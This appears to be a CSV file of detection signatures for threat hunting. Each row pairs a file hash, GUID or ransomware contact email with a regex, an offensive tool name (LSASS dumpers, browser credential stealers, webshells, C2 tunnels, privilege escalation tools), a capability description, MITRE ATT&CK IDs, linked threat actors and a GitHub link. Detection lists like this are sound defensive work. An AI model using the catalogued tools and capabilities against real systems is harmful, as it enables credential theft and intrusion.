"*887e0ff0707e46e7f309f6e12eaddd4161b6b3aa88a705857ac55590cdc4c64a*",".{0,1000}887e0ff0707e46e7f309f6e12eaddd4161b6b3aa88a705857ac55590cdc4c64a.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","#filehash","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","30467"
"*8880e4d7caf33e5da9a785d4c2da5bdcc6ba6315f882900f88c0adf1872e8fb8*",".{0,1000}8880e4d7caf33e5da9a785d4c2da5bdcc6ba6315f882900f88c0adf1872e8fb8.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","30468"
"*88828@PROTONMAIL.CH*",".{0,1000}88828\@PROTONMAIL\.CH.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","30469"
"*8883c36d251e050a0e232a171024b166f8ab5b4efa0f455fd987560fed85d175*",".{0,1000}8883c36d251e050a0e232a171024b166f8ab5b4efa0f455fd987560fed85d175.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30470"
"*8886b069180a096d54b6d6555aa3a5b8c44359eb858a072f6e34943fe40b1fdf*",".{0,1000}8886b069180a096d54b6d6555aa3a5b8c44359eb858a072f6e34943fe40b1fdf.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","30471"
"*88888dcb2ac77d09b3c68c26f025f1e1ba9db667f3950a79a110896de297e162*",".{0,1000}88888dcb2ac77d09b3c68c26f025f1e1ba9db667f3950a79a110896de297e162.{0,1000}","offensive_tool_keyword","SafetyDump","in memory process dumper - uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to standard output","T1003.005 - T1059.001 - T1105 - T1071.001","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","0","#filehash","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","30472"
"*888e7d4c8b99cb78ebd6a9a93d74b768c0f66ca210dbb9a3705d7636b609788b*",".{0,1000}888e7d4c8b99cb78ebd6a9a93d74b768c0f66ca210dbb9a3705d7636b609788b.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30473"
"*8897b01cd05406b33c497bd06f9bd278726ae9812352caecdbc8528dd630eb5e*",".{0,1000}8897b01cd05406b33c497bd06f9bd278726ae9812352caecdbc8528dd630eb5e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30475"
"*8898af517b30c917a82e087530e829ec5d46a5dd43759fb66202e3945a380aa5*",".{0,1000}8898af517b30c917a82e087530e829ec5d46a5dd43759fb66202e3945a380aa5.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","30476"
"*8898f5cd09c750f7c2c1718688eef375d659c00e9a2c98b96b3f450ac294b82f*",".{0,1000}8898f5cd09c750f7c2c1718688eef375d659c00e9a2c98b96b3f450ac294b82f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30477"
"*889a7d961d4e847d37d3019ccd1625a335d2e2d18c6fb1ec1d41aa4df679f553*",".{0,1000}889a7d961d4e847d37d3019ccd1625a335d2e2d18c6fb1ec1d41aa4df679f553.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30478"
"*889b051531cf8ec665b0f1730e4ed69e70949341166ff531d703f9e5b8f448ce*",".{0,1000}889b051531cf8ec665b0f1730e4ed69e70949341166ff531d703f9e5b8f448ce.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30479"
"*889dc7cce75cae74fe761345fc1f0e02e8b97f705c92a5a136666250301a1215*",".{0,1000}889dc7cce75cae74fe761345fc1f0e02e8b97f705c92a5a136666250301a1215.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","30480"
"*889dc7cce75cae74fe761345fc1f0e02e8b97f705c92a5a136666250301a1215*",".{0,1000}889dc7cce75cae74fe761345fc1f0e02e8b97f705c92a5a136666250301a1215.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","30481"
"*889E3D8B-58FA-462D-A2D8-3CB430484B6A*",".{0,1000}889E3D8B\-58FA\-462D\-A2D8\-3CB430484B6A.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","0","#GUIDproject","N/A","8","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","30482"
"*88a56a39fa828dee79620714e53285c2c5bfbec814e64ab150d8795b0d78940c*",".{0,1000}88a56a39fa828dee79620714e53285c2c5bfbec814e64ab150d8795b0d78940c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30483"
"*88B40068-B3DB-4C2F-86F9-8EADC52CFE58*",".{0,1000}88B40068\-B3DB\-4C2F\-86F9\-8EADC52CFE58.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","#GUIDproject","N/A","10","","N/A","","","","30484"
"*88b61c15b152274439f7639dbbeca8839b6ca20e52599cd6e1493a3e3533668f*",".{0,1000}88b61c15b152274439f7639dbbeca8839b6ca20e52599cd6e1493a3e3533668f.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","30485"
"*88babbe96838fcad9b486bd36f4bce32d242848ab4aa71c739fd6338dea37a68*",".{0,1000}88babbe96838fcad9b486bd36f4bce32d242848ab4aa71c739fd6338dea37a68.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30486"
"*88c940e5e4e3728a9433887cfd7eb308d8d4e5e24f5ab49b3c13dcc595da89d0*",".{0,1000}88c940e5e4e3728a9433887cfd7eb308d8d4e5e24f5ab49b3c13dcc595da89d0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30488"
"*88ccca47d7e7529c4c1c3abe61dce761d10fcea8a06b7234ed1b5f63fbf3c710*",".{0,1000}88ccca47d7e7529c4c1c3abe61dce761d10fcea8a06b7234ed1b5f63fbf3c710.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30489"
"*88dc61a50afafe0e0ffff60913d45f2abe2a298c2c8a067fc7044e7251eb9012*",".{0,1000}88dc61a50afafe0e0ffff60913d45f2abe2a298c2c8a067fc7044e7251eb9012.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","#filehash","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","30491"
"*88e13a123b49e19188a4d51b83b060fd5fe0d6b4cdd96e6557792d229d339f64*",".{0,1000}88e13a123b49e19188a4d51b83b060fd5fe0d6b4cdd96e6557792d229d339f64.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30493"
"*88e3cee91cfda389858ecd70bf3f9b8e45ce7d41761cb7b13075e8d003724007*",".{0,1000}88e3cee91cfda389858ecd70bf3f9b8e45ce7d41761cb7b13075e8d003724007.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30495"
"*88e73ed9922003522ffe4b79167dc818716adc62dc6c739f6c7422ae209bd233*",".{0,1000}88e73ed9922003522ffe4b79167dc818716adc62dc6c739f6c7422ae209bd233.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30496"
"*88f176c26ca3b46abea5d783cb01e82eb4c9ce1da3f0184a3994a01e04679934*",".{0,1000}88f176c26ca3b46abea5d783cb01e82eb4c9ce1da3f0184a3994a01e04679934.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30498"
"*88f333f2f21ca05e44a91c376022997c2bbec79b9d9982d59ee6d38183df86f3*",".{0,1000}88f333f2f21ca05e44a91c376022997c2bbec79b9d9982d59ee6d38183df86f3.{0,1000}","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","30499"
"*88f826096be1ed1be32dd45dc2381189df7c5f349c7b808edb872e68be4a9350*",".{0,1000}88f826096be1ed1be32dd45dc2381189df7c5f349c7b808edb872e68be4a9350.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","30501"
"*8903483f5b5e84041ec7a90bab38a4b430c28925717cb09c3199f46952046aa7*",".{0,1000}8903483f5b5e84041ec7a90bab38a4b430c28925717cb09c3199f46952046aa7.{0,1000}","offensive_tool_keyword","PowerShellRunner","PowerShell runner for executing malicious payloads in order to bypass Windows Defender","T1059.001 - T1562.001 - T1218.005","TA0002 - TA0005","N/A","Turla","Defense Evasion","https://github.com/dievus/PowerShellRunner","1","0","#filehash","N/A","9","1","70","20","2021-11-22T18:43:16Z","2021-08-03T01:29:34Z","30502"
"*8904000180688b0ba69b2bc6647fc42c34ed9fce15ed7687d53958f9f9ac6357*",".{0,1000}8904000180688b0ba69b2bc6647fc42c34ed9fce15ed7687d53958f9f9ac6357.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#filehash","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","30503"
"*8905becea35b76ddcebac536548ccf08a14eb684fac25063a350c9d0b3a95369*",".{0,1000}8905becea35b76ddcebac536548ccf08a14eb684fac25063a350c9d0b3a95369.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","30504"
"*8909f956ab41ad565935485870d05b47db8482c703aa7ea142ef1eff310e8b89*",".{0,1000}8909f956ab41ad565935485870d05b47db8482c703aa7ea142ef1eff310e8b89.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30505"
"*890f13ab9ee7ea722baf0ceb3ee561c0*",".{0,1000}890f13ab9ee7ea722baf0ceb3ee561c0.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","30506"
"*8915669ca2e25c835fbc5c022b3f1d62fab4569190e216a4b37a8d1e4f94208c*",".{0,1000}8915669ca2e25c835fbc5c022b3f1d62fab4569190e216a4b37a8d1e4f94208c.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","#filehash","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","30509"
"*89269edf8f752740d81254dd68ae0c8ed29d18cfb8582620e4759b48ad47ddb3*",".{0,1000}89269edf8f752740d81254dd68ae0c8ed29d18cfb8582620e4759b48ad47ddb3.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","30513"
"*8932afe71961b1dc93c851471a11f50329aab1715cfb60875c087c94a29a1910*",".{0,1000}8932afe71961b1dc93c851471a11f50329aab1715cfb60875c087c94a29a1910.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30515"
"*89379d7dcc96b1f8399884532c399c7522bdde6aed85b483e1ff81c6deab4f7b*",".{0,1000}89379d7dcc96b1f8399884532c399c7522bdde6aed85b483e1ff81c6deab4f7b.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","30516"
"*893CC775-335D-4010-9751-D8C8E2A04048*",".{0,1000}893CC775\-335D\-4010\-9751\-D8C8E2A04048.{0,1000}","offensive_tool_keyword","potato","Potato Privilege Escalation on Windows","T1134.001 - T1068  - T1055 - T1546.015","TA0004","N/A","N/A","Privilege Escalation","https://github.com/foxglovesec/Potato","1","0","#GUIDproject","N/A","7","8","721","165","2021-01-16T20:34:04Z","2016-02-09T11:28:17Z","30517"
"*89420ce0d71a81a4612e5bdd7de722bed41c31dbe4e0287e5222708f687d1936*",".{0,1000}89420ce0d71a81a4612e5bdd7de722bed41c31dbe4e0287e5222708f687d1936.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30518"
"*894399f27a67fa61608ef9a098bf9dc3ec009582d98193616cde9ab3b59f7a51*",".{0,1000}894399f27a67fa61608ef9a098bf9dc3ec009582d98193616cde9ab3b59f7a51.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","30520"
"*8943acdb8de2a40ca4fd8e1a2f98029aa6e8d78c9f19430b6ac557b6fb8ce4cb*",".{0,1000}8943acdb8de2a40ca4fd8e1a2f98029aa6e8d78c9f19430b6ac557b6fb8ce4cb.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","30521"
"*8943acdb8de2a40ca4fd8e1a2f98029aa6e8d78c9f19430b6ac557b6fb8ce4cb*",".{0,1000}8943acdb8de2a40ca4fd8e1a2f98029aa6e8d78c9f19430b6ac557b6fb8ce4cb.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","30522"
"*894a784e-e04c-483c-a762-b6c03e744d0b*",".{0,1000}894a784e\-e04c\-483c\-a762\-b6c03e744d0b.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#GUIDproject","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","30523"
"*894A784E-E04C-483C-A762-B6C03E744D0B*",".{0,1000}894A784E\-E04C\-483C\-A762\-B6C03E744D0B.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#GUIDproject","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","30524"
"*8956389a7a50dcf4b7ab221c1b91172e7f7fb298dbf43a8251abfb76334e7a4e*",".{0,1000}8956389a7a50dcf4b7ab221c1b91172e7f7fb298dbf43a8251abfb76334e7a4e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","30525"
"*895b297899e043df918c8b93301014d48fc1d9ddf926174ea1ad5cf05cc7c79a*",".{0,1000}895b297899e043df918c8b93301014d48fc1d9ddf926174ea1ad5cf05cc7c79a.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30526"
"*896106aa70f9ffdb5b219cbc1abcbdcff59bf05a339dcf9a2b9e095160f59e98*",".{0,1000}896106aa70f9ffdb5b219cbc1abcbdcff59bf05a339dcf9a2b9e095160f59e98.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","#filehash","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","30529"
